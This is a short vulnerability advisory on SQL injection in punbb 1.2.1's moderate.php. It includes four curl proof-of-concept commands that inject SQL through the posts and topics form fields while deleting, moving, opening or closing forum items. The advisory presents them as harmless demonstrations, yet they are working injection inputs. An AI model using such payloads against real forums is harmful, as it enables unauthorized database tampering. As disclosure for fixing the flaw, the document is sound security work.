Improper handling of several arguments in the moderate.php code in punbb version 1.2.1 allows a malicious moderator to inject arbitrary SQL statements.
==============================================
SQL Injections in punbb-1.2.1 moderate.php
==============================================
Description
-----------
Improper handling of several arguments in
moderate.php allows a malicious moderator (or admin)
to inject arbitrary SQL statements.
This also affects systems using the magic_quotes_gpc
option in php.ini.
Proof of concept
----------------
These examples will not do anything malicious or
even cause the system to report an error. Instead
they are crafted so that simply adding a ; or '
just before the comment "-- this won't show"
causes the SQL query to fail, demonstrating that
the injection is possible.
Assumptions:
- punbb_cookie contains identification of a
moderator for forum with id 1.
Attacks delete posts:
curl --referer http://target/moderate.php --form posts="0) -- this won't show" --form delete_posts_comply=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1\&tid=1
Attacks move topics:
curl --referer http://target/moderate.php --form topics="2) -- this won't show" --form move_to_forum=2 --form move_topics=1 --form move_topics_to=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1
Attacks delete topics:
curl --referer http://target/moderate.php --form topics="2) -- this won't show" --form delete_topics=1 --form delete_topics_comply=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1
Attacks open/close:
curl --referer http://target/moderate.php --form "topics[0) -- this won't show]=" --form open=1 --cookie "punbb_cookie=<valid cookie>" target/moderate.php?fid=1